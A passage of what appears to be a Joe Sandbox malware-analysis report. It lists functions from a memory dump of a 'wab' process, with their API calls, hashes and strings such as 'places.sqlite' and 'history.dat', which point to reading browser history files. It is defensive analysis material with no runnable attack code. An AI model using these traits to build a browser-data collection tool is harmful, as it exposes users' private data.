                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2947809556-0
                                                                                                                                                                                                                    • Opcode ID: e9fa8cdb0503d843af4e6d4979f9032e8967895c6ef67b6505ea85934ab3b907
                                                                                                                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9fa8cdb0503d843af4e6d4979f9032e8967895c6ef67b6505ea85934ab3b907
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                    • API String ID: 3093078384-467022611
                                                                                                                                                                                                                    • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 839530781-0
                                                                                                                                                                                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3831604043-0
                                                                                                                                                                                                                    • Opcode ID: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                                                                                                                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a85243c3274abcf257bc8a1d0c36c9fb31ec9b9764bc30e3ac6d524e65cdc455
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1156039329-0
                                                                                                                                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1631957507-0
                                                                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1125800050-0
                                                                                                                                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: realloc
                                                                                                                                                                                                                    • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                    • API String ID: 471065373-2134078882
                                                                                                                                                                                                                    • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                                                                                                                                                                                    • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: BINARY
                                                                                                                                                                                                                    • API String ID: 2221118986-907554435
                                                                                                                                                                                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1161345128-0
                                                                                                                                                                                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: .Ww
                                                                                                                                                                                                                    • API String ID: 2081463915-571950480
                                                                                                                                                                                                                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 159017214-0
                                                                                                                                                                                                                    • Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3150196962-0
                                                                                                                                                                                                                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
